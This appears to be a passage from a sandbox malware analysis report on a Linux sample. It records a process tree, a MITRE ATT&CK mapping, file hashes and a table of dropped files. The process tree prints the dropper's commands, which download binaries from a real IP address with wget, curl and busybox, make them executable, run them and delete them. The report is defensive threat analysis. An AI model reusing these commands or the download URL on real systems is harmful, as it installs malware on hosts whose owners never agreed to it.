  chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - File and Directory Permissions Modification
  PID:1677
- /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  ./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Executes dropped EXE
  PID:1678
- /bin/rm
  rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:1679
- /usr/bin/wget
  wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1680
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Writes file to tmp directory
  PID:1681
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1682
- /bin/chmod
  chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - File and Directory Permissions Modification
  PID:1683
- /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  ./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Executes dropped EXE
  PID:1684
- /bin/rm
  rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:1685

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	1520	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	1526	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	1532	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	1538	d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	1544	sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	1550	0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	1556	TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	1562	yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	1568	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	1574	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	1580	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	1586	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	1592	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	1598	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	1604	xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	1610	mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	1616	KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	1622	1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	1628	jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	1634	6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	1640	aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	1646	6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	1652	uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	1658	d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	1664	sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	1672	0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	1678	TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	1684	yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv